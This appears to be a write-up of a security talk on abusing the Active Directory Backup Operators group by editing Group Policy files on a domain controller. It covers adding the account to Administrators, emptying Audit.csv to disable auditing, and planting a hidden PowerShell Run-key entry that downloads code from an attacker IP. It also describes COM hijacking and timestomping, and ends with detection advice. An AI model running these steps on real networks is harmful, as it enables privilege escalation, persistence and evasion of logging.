Dave Mayer specializes in red teaming and pen testing. This talk came out of only having a limited number of ports (135, 139, and 445) available on a domain controller during a pen test. Null sessions were identified, domain users were dumped, and the only account recovered was the Backup Operators account in the Backup Operators security group. Typically these accounts have been around for years, haven’t had their password changed since creation, are used to back up a large number of systems across the domain, and may have been migrated from one backup solution to another. Let’s look at how to abuse these permissions to obtain unauthorized access.
Backup Operators is a built-in container that provides functionality to override security restrictions for the sole purpose of backing up or restoring files. This group does not provide:
- remote desktop access
- local administrator permissions
- launching processes from over the network.
- local console login
- log on as a batch job
- shutdown the system
- backup files/directories
- restore files/directories
To use the backup permissions, a high integrity session must be used. These processes can also be run with network only permissions from RunAs. To copy a single file or a directory, the following commands can be used:
#single file with backup permissions
robocopy.exe $source_folder $destination_folder $file /b
#directory copies using backup permissions and getting empty folders
robocopy.exe $source_folder $destination_folder /e /b
How to Backup Files Demo Commands
whoami
runas /netonly /user:$DOMAIN\backup cmd.exe
robocopy \\$DOMAIN_CONTROLLER\sysvol\$DOMAIN\ c:\GroupPolicy\ /b /s
#an error message will appear if the correct permissions aren't configured
#restore a file back to the domain controller after altering it
robocopy c:\GroupPolicy\modified\Policies\$GUID \\$DOMAIN_CONTROLLER\sysvol\$DOMAIN\$GUID GPT.INI /b
Privilege Escalation
Default Domain Controllers Policy have the same GUID on all domains, and the speaker hasn’t seen any clients change this. The GUID is below, the group policy configuration files that are stored on sysvol for all systems in the domain to access are below, the applied privileges for systems under the GPO are below, and the SID for Backup Operators are below.
#background information
{6AC1786C-016F-11D2-945F-00C04FB984F9}
\\$DOMAIN_CONTROLLER\sysvol\$DOMAIN\Policies\{6AC1786C-016F-11D2-945F-00C04FB984F9}\
$GPO_PATH\MACHINE\Windows NT\SecEdit\GptTmpl.inf
*S-1-5-32-551
#get the account SID with PowerView, which is everything but the 1109
Get-DomainUser backup | Select name,objectsid
S-1-5-21-3367745724-233473374-3840074820-1109
#modify the [Group Membership] value in GptTmpl.inf and set it to the group SID you want it to be a member of, Administrators in this case
[Group Membership]
*S-1-5-21-3367745724-233473374-3840074820-1109__Memberof = *S-1-5-32-544
#restore the changed policy
robocopy "C:\GroupPolicy\Modified\MACHINE\Microsoft\Windows NT\SecEdit" "\\$DOMAIN_CONTROLLER\SYSVOL\$DOMAIN\Policies\$GUID\MACHINE\Microsoft\Windows NT\SecEdit" GptTmpl.inf /b
#validate the changes or wait for the GPO to propagate if one doesn't already have access
gpupdate /force
net localgroup administrators
Targeting a System
Find a Computer Object that we’d like to target, analyze the GPOs that are applied to the target system, and add the SID of the account being used to gain access.
#using PowerView and noting the gpcfilesyspath
Get-DomainGPO -ComputerIdentity $COMPUTER_NAME
Get-DomainUser -Identity backup
#modify the default GptTmpl.inf file by adding another SID to Members and putting the group SID first then the entire account SID
*S-1-5-32-544__Members = *S-1-5-21-3367745724-233473374-3840074820-1115, *S-1-5-21-3367745724-233473374-3840074820-1109
#wait for the GPO to update
net localgroup administrators
This is a noisy attack if the right things are being monitored within an environment. The original GPO should be backed up so that it can be restored once the attack is done. Additionally, some artifacts may be left on systems after the GPO is reverted, such as the admin accounts that were added to the local groups on a system.
Abusing Active Directory Auditing
The configuration information for what is logged is stored in a Group Policy Object
\\$DOMAIN_CONTROLLER\sysvol\$DOMAIN\Policies\{6AC1786C-016F-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\Audit\Audit.csv
The information within the file should be reviewed to determine what is being logged. Detailed File Share auditing should log all file share accesses, but this generates a large volume of events on a Domain Controller. Directory Services Changes logs all creation, deletion, and modification of AD objects. This also generates a large volume of events on a Domain Controller. However, since the audit settings are controlled by a CSV, and Backup Operators can restore files, let’s disable AD auditing by deleting the contents of the Audit.csv file. These settings can be restored by restoring the backed up Audit.csv file to its original location.
Modifying the Registry
A Group Policy can also impact registry changes which are stored in Registry.pol files. These files can contain both user and computer settings. While notepad won’t work for this, a native tool LGPO.exe, or Local Group Policy Object utility, can be used for this purpose.
#pull down all the settings that are in the policies
LGPO.exe /parse /m Registry.pol > machine.txt
LGPO.exe /parse /u Registry.pol > user.txt
#add a malicious HKLM entry that will run for every user impacted by this GPO / Organizational Unit that also logs in
Computer
Software\Microsoft\Windows\CurrentVersion\Run
Slartibartfast
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://$attacker_ip/sauce');"
#recombine the files and commit the modified lgpo
type machine.txt >> lgpo.txt
type user.txt >> lgpo.txt
LGPO.exe /r lgpo.txt /w modified\Registry.pol
#validate settings that will be cached even after the changes are reverted (even after a reboot)
hostname
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
COM Hijack
While not an in-depth discussion for COM Hijacking, we can also use Group Policies to target specific machines & users as previously discussed. Then we can drop a DLL to disk on a target workstation in a specific path and then modify the GPO’s COM object to that specific DLL. The InprocServer32 example is shown with the (Default) reg key with a type of REG_EXPAND_SZ and data of “C:\malicious.dll”. The other key is ThreadingModel, with a type of REG_SZ and data of “Both”. Once the GP refreshes, any systems with this DLL that are impacted by the modified GPO will execute the DLL.
3rd Party Plugins
Centrify is a third party plugin that creates a virtual registry on Mac and Linux machines so that Active Directory policies can be extended to Mac and Linux computers. The settings are stored in Registry.pol files and have settings that impact whether or not ssh is enabled on the endpoint and what users are local administrators over the endpoints.
More Manipulation
Once the group policies are modified, the restored files can be time stomped to make it appear as if the GPOs have not been changed since their original modification date. Restore the originals after reaching the objective of the engagement.
Other Fails
Can’t copy NTDS.DIT from a running system.
Artifacts
Local admin accounts may remain cached until it is cleaned up. Registries entries may remain, so the added entries must be removed manually. Group Policy will accept the changes when restored, so be sure to clean up and restore all original group policies to their original state.
Detection
Default logging only indicates a network logon for the backup account. Consider baselining when this account should be used and ensure that it’s only used during the times that it should be. Additionally, adding an account to a group via Active Directory Users and Computers (ADUC) generates Event ID 4728. However, modifying the GPO GptTmpl.inf does not generate a log entry. For Event ID 5145 with the detailed file share auditing enabled, writing of data to the audit.csv file will be logged, which shouldn’t happen unless Group Policies are actually being updated. Definitely alert on Event ID 5145 and Event ID 4719 and have File Integrity Monitoring (FIM) outside of native Microsoft functionality on the Domain Controllers to ensure the integrity of the Group Policies.
Going Further
There are numerous files related to Active Directory on the Domain Controllers. Keep exploring to identify unintended methods of modifying files that result in the bypassing of audit logs or obtaining additional unauthorized access.
Conclusions
Monitor when backup accounts are logging on, when changes to files on Domain Controllers happen, and alert on unexpected changes.